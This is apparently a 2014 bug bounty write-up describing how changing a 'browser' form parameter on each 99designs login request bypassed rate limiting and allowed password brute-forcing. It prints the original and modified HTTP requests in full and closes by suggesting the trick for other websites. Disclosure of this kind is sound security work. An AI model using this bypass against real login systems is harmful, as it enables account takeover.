Another Way to Bypass Rate Limiting
I want to share one of my finding on account.99designs.com which I have reported to them on 5th May 2014.
I have found that site.com
following Url https://account.99designs.com/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= was vulnerable to
Bruteforce attacks even when the Rate-Limting is implement for all the site.com users account and the server is disabling the requests.
So
first I tried to do the Status Code Value or Response Code Value, Length Code
Analysis but it was same as 200 for all Right & Wrong Password
attempts as we hit the 60 Wrong Password Attempts also the error message was generic for all Right & Wrong
Password Attempts.
Then
I tried to do the User-Agent based bruteforce attack by changing the
user-agent to known and anonymous user-agent in header of the each
request but it also failed and then after further more Deep Analysis I
found that there was a parameter named browser was sent using post
method in each request with Wrong or Right Password and this parameter
was containing a value which was the currently used browsers name i.e.
internet+explorer. So, that means the server was checking the User-Agent
using header and also using the browser name parameter and its value
internet+explorer.
So
to find weakness in the Rate Limiting countermeasure 1st sent more then
60 Wrong Password requests using the browser parameter with the value
internet+explorer as the 60 Wrong Password requests sent the the Rate
Limiting got enabled and it started blocking the wrong or right password
request and was sending the response code and length code as 200 for all Right & Wrong Password
attempts also the error message was generic for all Right & Wrong
Password Attempts so again it failed.
After
that I started sending each request with the browser named parameter
value which I changed to any known and also any unknown value as browser
name value. So, then I observed that after more then 60 Wrong Password
Attempts and also even after more then 10000 Wrong Passwords Attempts
the Rate Limiting didn't got enabled nor the Status Code Value or
Response Code Value, Length Code values changed to 200. Instead for
Right Password it was 302 and for Wrong Pass it was 200.
So,
in this way I was able to Bypass the site.com Rate Limting by changing the browser parameter value in each request and by analyzing
the Status Code Value or Response Code Value, Length Code values
differences.
Original Request:
POST
/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA=
HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie:
__iswl_account99designscom=0;
sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073;
sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F;
__ssid=69a7009e-a365-4481-87e3-60620271c47d;
CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
username=victimemailid@gmail.com&password=shssjssjs&browser=Internet+Explorer&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH
Modified Request:
POST
/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA=
HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie:
__iswl_account99designscom=0;
sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073;
sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F;
__ssid=69a7009e-a365-4481-87e3-60620271c47d;
CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
username=victimemailid@gmail.com&password=shssjssjs&browser=test+test&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH
In this way the attacker was able to Bypass the Rate Limiting of 99designs.
Impact:
The attacker can
successfully bruteforce the passwords on any users account even when
the rate limiting is enabled and this can lead
to account compromise.
Recommendation:
The Length Code Value for Right & Wrong Passwords shall always be Same for Any Users Account.
Instead of user-agent based validation for enabling the rate limiting user id shall be checked for numbers of wrong password attempts.
The account shall only be unlocked using a email which contains a Un-Lock account link.
The vulnerability was mitigated by 99designs Security Team.
So in this way, one can
Bypass Rate Limiting and can also compromise the victims
account also this technique can be used to find same type of
vulnerabilities on different websites.
Suggestions and Feedback's are welcome.
